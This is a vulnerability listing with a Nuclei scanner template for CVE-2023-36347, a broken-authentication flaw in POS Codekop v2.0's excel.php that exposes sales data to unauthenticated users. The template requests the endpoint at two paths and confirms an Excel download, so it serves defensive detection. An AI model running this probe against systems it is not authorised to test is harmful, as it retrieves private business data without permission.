POS Codekop v2.0 - Broken Authentication

2024-05-1303:43:34

ProjectDiscovery

github.com

cve

cve2023

codekop

pos

auth-bypass

excel

download

authentication

unauthorized-access

remediation

session-management

7.1 High

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

41.6%

JSON

A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.

id: CVE-2023-36347

info:
  name: POS Codekop v2.0 - Broken Authentication
  author: princechaddha
  severity: high
  description: |
    A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive information.
  remediation: |
    Implement proper authentication mechanisms and ensure secure user session management.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-36347
    cwe-id: CWE-306
    epss-score: 0.00103
    epss-percentile: 0.41216
    cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:*
  metadata:
    vendor: codekop
    product: codekop
  tags: cve,cve2023,codekop,pos,auth-bypass

http:
  - method: GET
    path:
      - "{{BaseURL}}/excel.php"
      - "{{BaseURL}}/pos-kasir-php/excel.php"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>Document"

      - type: word
        part: header
        words:
          - "application/vnd.ms-excel"
# digest: 4a0a00473045022077189be5ccce61297097eca131b1b294f7016b564239aa193f2d5f7e10fe3804022100f0e9a5eb809b62f99118a52f104c6347d099bf2f0aa8236cd2e35d766eede99e:922c64590222798bb761d5b6d8e72950